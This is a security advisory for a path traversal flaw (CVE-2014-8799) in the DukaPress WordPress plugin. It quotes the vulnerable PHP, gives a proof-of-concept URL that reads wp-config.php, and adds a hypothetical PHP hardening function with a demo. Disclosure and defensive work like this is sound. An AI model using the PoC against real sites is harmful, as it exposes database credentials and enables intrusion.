DukaPress 2.5.2 Path Traversal

Homepage:

https://wordpress.org/plugins/dukapress/

CVE-ID

CVE-2014-8799

CVSS Score

7.8

CVSS Vector

(AV:N/AC:L/Au:N/C:C/I:N/A:N)

Description:

File: dukapress\lib\dp_image.php

if (!function_exists('add_action')) {
    require_once('../../../../wp-load.php');
}

echo file_get_contents(dp_img_resize('', $_REQUEST['src'],$_REQUEST['w'], $_REQUEST['h']));

dp_img_resize returns the given $img_url parameter unchanged if $width and $height (in our case $_REQUEST['w'] and $_REQUEST['h']) are not supplied.

File: dukapress\php\dp-functions.php

function dp_img_resize($attach_id = null, $img_url = null, $width, $height, $crop = true){
	if($width && $height){
		// unnecessary lines skipped
		return $image_src[0];
	}else{
		// no width/height given: $img_url is returned as supplied by the caller
		return $img_url;
	}
}

The returned value is passed straight to file_get_contents and echoed, so we can display any file by passing only the src parameter.

Proof of Concept:

http://wordpress-url/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php
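
One way to constrain the src parameter before it reaches file_get_contents(), shown as an added example that is not DukaPress code or the project's own fix. The function dp_safe_image_path(), the uploads base directory and the sample files are hypothetical.

```php
<?php
// Added example, not DukaPress code. dp_safe_image_path() and the
// directory layout used below are hypothetical, chosen for illustration.
function dp_safe_image_path(string $baseDir, string $src): ?string
{
    $base = realpath($baseDir);
    if ($base === false || $src === '' || strpos($src, "\0") !== false) {
        return null;
    }
    // Reject stream wrappers and URLs (http://, php://, file://, ...)
    // up front instead of relying on realpath() failing on them.
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $src)) {
        return null;
    }
    // realpath() collapses "../" and symlinks; false means no such file.
    $real = realpath($base . DIRECTORY_SEPARATOR . $src);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // Containment check on the canonical path, with a trailing separator
    // so "/uploads-evil" does not pass as a child of "/uploads".
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    // Allowlist of image extensions, checked on the resolved file name.
    $ext = strtolower(pathinfo($real, PATHINFO_EXTENSION));
    return in_array($ext, ['jpg', 'jpeg', 'png', 'gif'], true) ? $real : null;
}

// Constructed sample tree: <tmp>/site/wp-config.php and <tmp>/site/uploads/a.png
$site = sys_get_temp_dir() . '/dp_demo_' . uniqid();
mkdir("$site/uploads", 0700, true);
file_put_contents("$site/wp-config.php", "<?php // constructed secret\n");
file_put_contents("$site/uploads/a.png", "constructed placeholder bytes");

foreach (['a.png', '../wp-config.php', 'php://filter/resource=a.png', 'missing.png'] as $src) {
    $path = dp_safe_image_path("$site/uploads", $src);
    printf("%-30s => %s\n", $src, $path === null ? 'rejected' : 'served');
}
```

The containment check runs on the canonical path returned by realpath(), not on the raw string, so encoded or nested "../" sequences are resolved before the comparison.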

Timeline: